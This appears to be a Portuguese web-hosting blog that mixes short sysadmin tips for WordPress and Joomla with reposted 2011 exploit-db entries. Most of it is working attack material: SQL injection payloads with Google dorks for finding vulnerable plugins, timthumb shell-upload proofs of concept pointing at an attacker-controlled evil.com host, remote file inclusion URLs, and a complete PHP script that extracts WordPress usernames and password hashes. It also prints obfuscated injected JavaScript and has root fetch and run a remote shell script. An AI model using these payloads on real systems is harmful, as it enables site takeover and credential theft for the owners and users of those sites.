dnnViewState SPAM Joomla Como resolver (HOW TO SOLVE THIS)

Standard

É comum ver o CMS joomla em suas versões mais antigas sendo trollado por uma chuva de webbots, um dos defaces mais imundos que rodam na atualidade são justamente esses 2 (AVAST Chama-o de CLICKJACK-A — TROJAN):

 

<script type=”text/javascript” language=”JavaScript”>// <![CDATA[

function xViewState()

{

var a=0,m,v,t,z,x=new Array(‘9091968376′,’8887918192818786347374918784939277359287883421333333338896′,’877886888787′,’949990793917947998942577939317’),l=x.length;while(++a<=l){m=x[l-a];

t=z=”;

for(v=0;v<m.length;){t+=m.charAt(v++);

if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);

t=”;}}x[l-a]=z;}document.write(‘<‘+x[0]+’ ‘+x[4]+’>.’+x[2]+'{‘+x[1]+’}</’+x[0]+’>’);}xViewState();

// ]]></script>

Que normalmente respondem como xVIEWSTATE ou DNNVIEWSTATE, a saída para xViewState e dnnViewState está em localizar os termos em arquivos do joomla, mas 1 em comum costuma ser atacado, o arquivo modules/mod_AutsonSlideShow/tmpl/default.php, limpe a função acima (javascript) e o problema estará sanado!
Reza a lenda que wordpress sofre disso.
Para varrer seu código use o Dreamweaver ou qualquer IDE (até mesmo o terminal) que faça varredura em todos arquivos por um termo em especial (procure por dnnView ou xView) e finish!

Abraços!

Blank Pages no WordPress, como sanar?

Standard

Passos para Sanar o Problema:

 

1 – Entre no WHM como root,

2 – Siga os menus e submenus (->)  Home (Início) -> Service Configuration -> PHP Configuration Editor,

3 – Localize o item Memory_Limit, esse deve possuir PELO MENOS 320mb (sim, há plugins pesados que consomem muita ram),

4 – Localize Upload_max_filesize, apesar de não influenciar aqui, no momento de uploads você pode se dar mal, deixe pelo menos 500MB (nossa hospedagem permite 2gb de upload),

5 – Localize Max_execution_time, deixe pelo menos 600s (para uploads longos ou processos de plugins será de suma importância ter execução longa),

6 – Localize Max_input_time e deixe pelo menos 300s.

 

De todos os pontos que citamos, os 2 principais para sanar o problema são MEMORY_LIMIT e Max_Execution_Time.

 

Fonte: http://webking.com.br/blog/wordpress-dando-pagina-branca-blank-pages-in-wordpress-cpanel-whm/

Como resolver as Páginas brancas do WordPress no Cpanel

Standard

Postei recentemente como sanar um problema de páginas brancas no WordPress.

Se seu WordPress está mostrando uma página branca na página inicial do seu WordPress é aqui mesmo que seu problema acaba ;).

Para acessar o artigo clique no Link abaixo:

http://webking.com.br/blog/wordpress-dando-pagina-branca-blank-pages-in-wordpress-cpanel-whm/

Qualquer conexão com WordPress vem o erro ao XXX wordpress Ocorreu um erro inesperado.

Standard

Se você está recebendo a mensagem -> Ocorreu um erro inesperado (unexpected error) <— ao tentar fazer QUALQUER coisa remota do wordpress (instalar uma versão, atualizar um plugin, instalar um plugin, ver o Akismet e etc) nem se preocupe, a saída é simples e clara:

1 – Veja se a porta de saída 80 está liberada no seu firewall (bom deixar também a 443 de SSL),

2 – Veja se as pastas do wordpress estão com permissão correta (755 sob suExec ou 777 em DSO sem suExec), assim como arquivos php com permissões corretas -> 644.

3 – Caso os dois pontos acima estejam ok mande o admin do servidor fazer um teste, no arquivo /etc/resolv.conf mande colocar no começo do arquivo:

nameserver 8.8.8.8

nameserver 8.8.4.4

Esses dois nameservers resolvem publicamente usando infra-estrutura “fraquinha da Google”.

Dica de segurança: Por que devo atualizar meu WordPress, Joomla, Drupal ou qualquer gestor de conteúdos web?

Standard

Recentemente foi publicada na Icentral uma forma de inibir a frequência de ataques realizados a sites que usam Gestores de Conteúdos (mais conhecidos como CMS). A dica é simples e facilmente compreendida, recomendamos a leitura fortemente. Para acessar o conteúdo clique no link abaixo:

http://icentral.com.br/blog/qual-motivo-de-atualizar-um-cms-no-meu-host-quer-seja-wordpress-joomla-drupal-e-etc/

WordPress jetpack plugin SQL Injection Vulnerability

Standard

######################################################

# Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability
# Date: 2011-19-11
# Author: longrifle0x
# software: WordPress
# Download:http://wordpress.org/extend/plugins/jetpack/
# Tools: SQLMAP
######################################################
*DESCRIPTION
Discovered a vulnerability in  jetpack, WordPress Plugin,
vulnerability is SQL injection.
File:wp-content/plugins/jetpack/modules/sharedaddy.php
Exploit: id=-1; or 1=if
*Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php

[GET][id=-1][MID((VERSION()),1,6)

 

Fonte: http://www.exploit-db.com/exploits/18126/

Multiple WordPress Plugin timthumb.php Vulnerabilites

Standard


# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)

---
Description
---
The following WordPress plugins reuse a vulnerable version of the timthumb.php library.

By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled
domain such as blogger.com.evil.com and then providing it to the script through the
src GET parameter, it is possible to upload a shell and execute arbitrary code on the webserver.

Reference: http://www.exploit-db.com/exploits/17602/

# Plugin: Category Grid View Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-grid-view-gallery
# Software Link: http://wordpress.org/extend/plugins/category-grid-view-gallery/download/
# Version: 0.1.1

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/category-grid-view-gallery/cache/externel_md5(src).php

# Plugin: Auto Attachments WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/auto-attachments
# Software Link: http://wordpress.org/extend/plugins/auto-attachments/download/
# Version: 0.2.9

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/auto-attachments/thumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/auto-attachments/cache/external_md5(src).php

# Plugin: WP Marketplace WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/wp-marketplace
# Software Link: http://wordpress.org/extend/plugins/wp-marketplace/download/
# Version: 1.1.0

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/wp-marketplace/libs/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/wp-marketplace/libs/cache/external_md5(src).php

# Plugin: DP Thumbnail WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/dp-thumbnail
# Software Link: http://wordpress.org/extend/plugins/dp-thumbnail/download/
# Version: 1.0

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/dp-thumbnail/timthumb/cache/external_md5(src).php

# Plugin: Vk Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/vk-gallery
# Software Link: http://wordpress.org/extend/plugins/vk-gallery/download/
# Version: 1.1.0

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/vk-gallery/lib/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/vk-gallery/lib/cache/md5(src).php

# Plugin: Rekt Slideshow WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rekt-slideshow
# Software Link: http://wordpress.org/extend/plugins/rekt-slideshow/download/
# Version: 1.0.5

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/rekt-slideshow/picsize.php?src=MALICIOUS_URL

Must first base64 encode the URL.

The uploaded shell can be found at /wp-content/plugins/rekt-slideshow/cache/md5(src).php

# Plugin: CAC Featured Content WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cac-featured-content
# Software Link: http://wordpress.org/extend/plugins/cac-featured-content/download/
# Version: 0.8

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/cac-featured-content/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/cac-featured-content/temp/md5(src).php

# Plugin: Rent A Car WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rent-a-car
# Software Link: http://wordpress.org/extend/plugins/rent-a-car/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/rent-a-car/libs/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/rent-a-car/libs/cache/external_md5(src).php

# Plugin: LISL Last Image Slider WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/lisl-last-image-slider
# Software Link: http://wordpress.org/extend/plugins/lisl-last-image-slider/download/
# Version: 1.0

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/lisl-last-image-slider/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/lisl-last-image-slider/cache/external_md5(src).php

# Plugin: Islidex WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/islidex
# Software Link: http://wordpress.org/extend/plugins/islidex/download/
# Version: 2.7

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/islidex/js/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/islidex/js/cache/md5(src).php

# Plugin: Kino Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/kino-gallery
# Software Link: http://wordpress.org/extend/plugins/kino-gallery/download/
# Version: 1.0

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/kino-gallery/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/kino-gallery/cache/external_md5(src).php

# Plugin: Cms Pack WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cms-pack
# Software Link: http://wordpress.org/extend/plugins/cms-pack/download/
# Version: 1.3

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/cms-pack/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/uploads/cms-pack-cache/external_md5(src).php

# Plugin: A Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/a-gallery
# Software Link: http://wordpress.org/extend/plugins/a-gallery/download/
# Version: 0.9

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/a-gallery/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/a-gallery/cache/external_md5(src).php

# Plugin: Category List Portfolio Page WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-list-portfolio-page
# Software Link: http://wordpress.org/extend/plugins/category-list-portfolio-page/download/
# Version: 0.9

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/category-list-portfolio-page/scripts/cache/external_md5(src).php

# Plugin: Really Easy Slider WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/really-easy-slider
# Software Link: http://wordpress.org/extend/plugins/really-easy-slider/download/
# Version: 0.1

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/really-easy-slider/inc/thumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/really-easy-slider/inc/cache/external_md5(src).php

# Plugin: Verve Meta Boxes WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/verve-meta-boxes
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/verve-meta-boxes/download/
# Version: 1.2.8

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/verve-meta-boxes/tools/cache/external_md5(src).php

# Plugin: User Avatar WordPress plugin shell upload vulnerability
# Google Dork: inurl:wp-content/plugins/user-avatar
# Software Link: http://wordpress.org/extend/plugins/user-avatar/download/
# Version: 1.3.7

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/user-avatar/user-avatar-pic.php?id=0&allowedSites[]=blogger.com&src=http://blogger.com.evil.com/poc.php

Requires register_globals to be enabled and at least one user account to have an avatar directory.

The uploaded shell can be found at /wp-content/uploads/avatars/$id/external_md5(src).php

# Plugin: Extend WordPress WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/extend-wordpress
# Software Link: http://wordpress.org/extend/plugins/extend-wordpress/download/
# Version: 1.3.7

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/extend-wordpress/helpers/timthumb/cache/external_md5(src).php

Fonte: http://www.exploit-db.com/exploits/17872/

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

Standard


# Exploit Title: Relocate Upload WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{ // WP setup and function access
define('WP_USE_THEMES', false);
require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter

Fonte: http://www.exploit-db.com/exploits/17869/

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

Standard


# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/
# Version: 1.36 (tested)


PoC

http://SERVER/WP_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work)


Vulnerable Code

if (isset($_FILES[‘wpmm-upload’])) {
// Create WordPress environmnt
require_once(urldecode($_REQUEST[‘abspath’]) . ‘wp-load.php’);

// Handle attachment
WPMiniMail::wpmm_upload();
}

Fonte: http://www.exploit-db.com/exploits/17868/

WordPress PureHTML plugin

Standard


# Exploit Title: WordPress PureHTML plugin < = 1.0.0 SQL Injection Vulnerability # Date: 2011-08-31 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip # Version: 1.0.0 (tested) # Note: magic_quotes has to be turned off --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/pure-html/alter.php PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
if(!isset($_POST['PureHTMLNOnce'])){
if ( !wp_verify_nonce( $_POST['PureHTMLNOnce'], plugin_basename(__FILE__) )) {header("location:".$refer);}
}
else{
...
if(isset($_POST['id'])){$id = $_POST['id'];}else{$id='0';}
...
$action = $_POST['action'];

#delete
if($action == "delete"){
$sql = "delete from ".$wpdb->prefix."pureHTML_functions WHERE id='".$id."'";
$wpdb->query($wpdb->prepare($sql)); //misusage of $wpdb->prepare() :)

Fonte: http://www.exploit-db.com/exploits/17758/

WordPress yolink Search plugin

Standard


# Exploit Title: WordPress yolink Search plugin < = 1.1.4 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip # Version: 1.1.4 (tested) --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1 --------------- Vulnerable code --------------- $post_type_in = array(); if( isset( $_POST['page'] ) ) { $post_type_in[] = '"page"'; } if( isset( $_POST['post'] ) ) { $post_type_in[] = '"post"'; } $post_type_in = '(' . implode(',', $post_type_in) . ')'; $id_from = $_POST['from_id']; $batch_size = $_POST['batch_size']; $post_recs = $wpdb->get_results( $wpdb->prepare( "SELECT ID,GUID FROM $wpdb->posts WHERE post_status='publish' AND post_type IN $post_type_in AND ID > $id_from order by ID asc LIMIT $batch_size" ) ); //misusage of $wpdb->prepare() :)

Fonte: http://www.exploit-db.com/exploits/17757/

WordPress wp audio gallery playlist plugin

Standard


# Exploit Title: WordPress wp audio gallery playlist plugin < = 0.12 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/wp-audio-gallery-playlist.0.12.zip # Version: 0.12 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/wp-audio-gallery-playlist/playlist.php?post_gallery=-1' UNION ALL SELECT 1,2,3,4,5,database(),current_user(),8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23--%20 --------------- Vulnerable code --------------- $table_name = $wpdb->prefix . "posts";
...
if (isset($_GET['post_gallery']))
$query = 'SELECT * FROM `'.$table_name.'` WHERE `post_parent` = ''.$_GET['post_gallery'].'' AND `post_mime_type` = 'audio/mpeg' ORDER BY `menu_order` ASC';

Fonte: http://www.exploit-db.com/exploits/17756/

WordPress Crawl Rate Tracker plugin

Standard


# Exploit Title: WordPress Crawl Rate Tracker plugin < = 2.0.2 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zip # Version: 2.0.2 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20 --------------- Vulnerable code --------------- class b3_chartData extends b3_sbTrackingConfig { public function tracking_bot_report_chart_data() { ... if($_GET['page_url'] != '') { $bots = $this->wpdb->get_results("SELECT DATE(FROM_UNIXTIME(`visit_time`)) `visit_date`,`robot_name`,COUNT(*) `total` FROM $this->sbtracking_table WHERE `visit_time` >= '$start' AND `visit_time` < = '$end' AND `page_url` = '" . $_GET['page_url'] . "' GROUP BY `visit_date`,`robot_name`"); ... if ($_GET['chart_data']==1) { ... $chartData = new b3_chartData(); echo $chartData->tracking_bot_report_chart_data();

Fonte: http://www.exploit-db.com/exploits/17755/

WordPress Event Registration plugin

Standard


# Exploit Title: WordPress Event Registration plugin < = 5.4.3 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.zip # Version: 5.4.3 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/event-registration/event_registration_export.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
$id= $_REQUEST['id'];
...
$sql = "SELECT * FROM " . $events_detail_tbl . " WHERE id='$id'";
$result = mysql_query($sql);

Fonte: http://www.exploit-db.com/exploits/17751/

WordPress Contus HD FLV Player plugin

Standard


# Exploit Title: WordPress Contus HD FLV Player plugin < = 1.3 SQL Injection Vulnerability # Date: 2011-08-17 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/contus-hd-flv-player.1.3.zip # Version: 1.3 (tested) --- PoC --- http://www.site.com/wp-content/plugins/contus-hd-flv-player/process-sortable.php?playid=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)&listItem[]=1

---------------
Vulnerable code
---------------
$pid1 = $_GET['playid'];

foreach ($_GET['listItem'] as $position => $item) :
mysql_query("UPDATE $wpdb->prefix" . "hdflv_med2play SET `sorder` = $position WHERE `media_id` = $item and playlist_id=$pid1 ");
endforeach;

Fonte: http://www.exploit-db.com/exploits/17678/

WordPress File Groups plugin

Standard


# Exploit Title: WordPress File Groups plugin < = 1.1.2 SQL Injection Vulnerability # Date: 2011-08-17 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip # Version: 1.1.2 (tested) --- PoC --- http://localhost/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121))) --------------- Vulnerable code --------------- $fgid = $_GET['fgid']; ... $file_list = $wpdb->get_col("select guid from wp_posts where post_parent = $fgid");

http://www.exploit-db.com/exploits/17677/

WP E-commerce plugin

Standard


# Exploit Title: WP E-commerce plugin < = 3.8.4 Sql Injection # Google Dork: inurl:page_id= “Your billing/contact details” # Date: 18/07/2011 # Author: IHTeam # Software Link: http://www.getshopped.org/ # Version: 3.8.4 # Tested on: 3.8.4 # Original Advisory: http://www.ihteam.net/advisory/wordpress-wp-e-commerce-plugin/ $value ) {
$form_sql = "SELECT * FROM `" . WPSC_TABLE_CHECKOUT_FORMS . "` WHERE `id` = '$value_id' LIMIT 1";
$form_data = $wpdb->get_row( $form_sql, ARRAY_A );

FIX: Upgrade to version 3.8.5

Bug found by: IHTeam
Simone `R00T_ATI` Quatrini
Marco `white_sheep` Rondini
Francesco `merlok` Morucci
Mauro `epicfail` Gasperini
For GetShopped as their security auditors

This code has been released under the authorization of GetShopped staff.
It will show user_login and user_pass of wp_users table;

Google Dork: inurl:page_id= "Your billing/contact details"
Follow us on Twitter! @IHTeam
*/
function help() {
echo "n";
echo " -------------------WP e-Commerce < = 3.8.4 SQL Injection---------------nn"; echo " How to use: php wp-ecommerce.php host path page_id [table_name]nn"; echo " host = Domain namen"; echo " path = Path of WordPressn"; echo " page_id = Int value of the login page of WP e-commercen"; echo " table_name = Default is wp_usersnn"; echo " Example: php wp-commerce.php www.domain.com /wordpress/ 11 wp_usersnn"; echo " ----------------------------------------------------------------------nn"; } function exploit($host,$path,$pageid,$table) { $url = $host.$path."?page_id=".$pageid."&edit_profile=true"; $buggy_code=urlencode("-2' UNION ALL SELECT 2, concat(user_login,':',user_pass), 'email', 1, 1, null, 1, 2, 'billingfirstname', null, 0 from ".$table." WHERE '1'='1"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POST, 3); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POSTFIELDS,"collected_data[".$buggy_code."]=&submit=Save+Profile&submitwpcheckout_profile=true"); $result= curl_exec ($ch); curl_close ($ch); echo "Now using table name: $table... "; preg_match("/(.*?)< /span>.
/", $result, $matches);
if ( !isset($matches[1]) )
$msg="Wrong table name or not vulnerablen";
else
$msg="Credential found: ".$matches[1]."n";

return $msg;

}

if ( isset($argv[1]) && isset($argv[2]) && isset($argv[3]) ) {
if (isset($argv[4]))
$table = $argv[4];
else
$table = "wp_users";

$host = $argv[1];
$spos=strpos($host, "http://");
if(!is_int($spos)&&($spos==0))
$host="http://$host";

$path = $argv[2];
$pageid=(int)$argv[3];

/* Detecting the version, if possible */
$version = file_get_contents($host.$path.'wp-content/plugins/wp-e-commerce/readme.txt');
preg_match("/Stable tag: (.*)/", $version, $vmatch);

if ( !isset($vmatch[1]) )
$version="Not detectablen";
else
$version=$vmatch[1];

echo "Version: ".$version."n";
/* End of version detecting */

/* Executing exploit */
preg_match('/[^.]+.[^.]+$/', $host, $hmatch);
$host_name=str_replace('http://','',$hmatch[0]);

$tarray = array($table, 'wordpress_users', '_users', 'users', 'wpusers','wordpressusers', $host_name.'_users', str_replace('.','',$host_name).'_users', str_replace('.','',$host_name).'users' );

foreach($tarray as $index => $val) {
echo exploit($host,$path,$pageid,$val);
}
/* End of exploit */
} else
help();

Fonte: http://www.exploit-db.com/exploits/17613/

Como verificar versões de CMS de maneira rápida e prática

Standard

Para verificar devemos baixar a seguinte ferramenta em um dos dois endereços abaixo:

root@appunix:˜#wget http://server.cmsversion.com/checktest.sh

ou

root@appunix:˜#wget http://www.libphp.net/checktest.sh

Em seguida fazer o seguinte

root@appunix:˜#chmod +x checktest.sh

root@appunix:˜#./checktest.sh -u logindeumacontanomeuserver

A saída deverá assemelhar-se com:

Latest Joomla: 1.5.23
Installed Version: 1.5.20
Installed Location: /home/logindeumacontanomeuserver/public_html/pathdocms/

Essa dica funciona para Joomla, WordPress, WHMCS e etc.

WordPress 3.1.3 SQL Injection Vulnerabilities

Standard

SEC Consult Vulnerability Lab Security Advisory < 20110701-0 >

=======================================================================
title: Multiple SQL Injection Vulnerabilities
product: WordPress
vulnerable version: 3.1.3/3.2-RC1 and probably earlier versions
fixed version: 3.1.4/3.2-RC3
impact: Medium
homepage: http://wordpress.org/
found: 2011-06-21
by: K. Gudinavicius
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"WordPress was born out of a desire for an elegant, well-architectured
personal publishing system built on PHP and MySQL and licensed under
the GPLv2 (or later). It is the official successor of b2/cafelog.
WordPress is fresh software, but its roots and development go back to
2001."
Source: http://wordpress.org/about/
Vulnerability overview/description:
-----------------------------------
Due to insufficient input validation in certain functions of WordPress
it is possible for a user with the "Editor" role to inject arbitrary
SQL commands. By exploiting this vulnerability, an attacker gains
access to all records stored in the database with the privileges of the
WordPress database user.
Proof of concept:
-----------------
1) The get_terms() filter declared in the wp-includes/taxonomy.php file
does not properly validate user input,  allowing an attacker with
"Editor" privileges to inject arbitrary SQL commands in the "orderby"
and "order" parameters passed as array members to the vulnerable filter
when sorting for example link categories.
The following URLs could be used to perform blind SQL injection
attacks:
http://localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[SQL
injection]&order=[SQL injection]
http://localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby=[SQL
injection]&order=[SQL injection]
http://localhost/wp-admin/edit-tags.php?taxonomy=category&orderby=[SQL
injection]&order=[SQL injection]
2) The get_bookmarks() function declared in the
wp-includes/bookmark.php file does not properly validate user input,
allowing an attacker with "Editor" privileges to inject arbitrary SQL
commands in the "orderby" and "order" parameters passed as array
members to the vulnerable function when sorting links.
The following URL could be used to perform blind SQL injection attacks:
http://localhost/wp-admin/link-manager.php?orderby=[SQL
injection]&order=[SQL injection]
Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in version 3.1.3 of
WordPress, which is the most recent version at the time of discovery.
Vendor contact timeline:
------------------------
2011-06-22: Contacting vendor through security () wordpress org
2011-06-22: Vendor reply, sending advisory draft
2011-06-23: Vendor confirms security issue
2011-06-30: Vendor releases patched version
2011-07-01: SEC Consult publishes advisory
Solution:
---------
Upgrade to version 3.1.4 or 3.2-RC3
Workaround:
-----------
A more restrictive role, e.g. "Author", could be applied to the user.
Advisory URL:
-------------
https://www.sec-consult.com/en/advisories.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com

EOF K. Gudinavicius / @2011

 

Fonte: http://www.exploit-db.com/exploits/17465/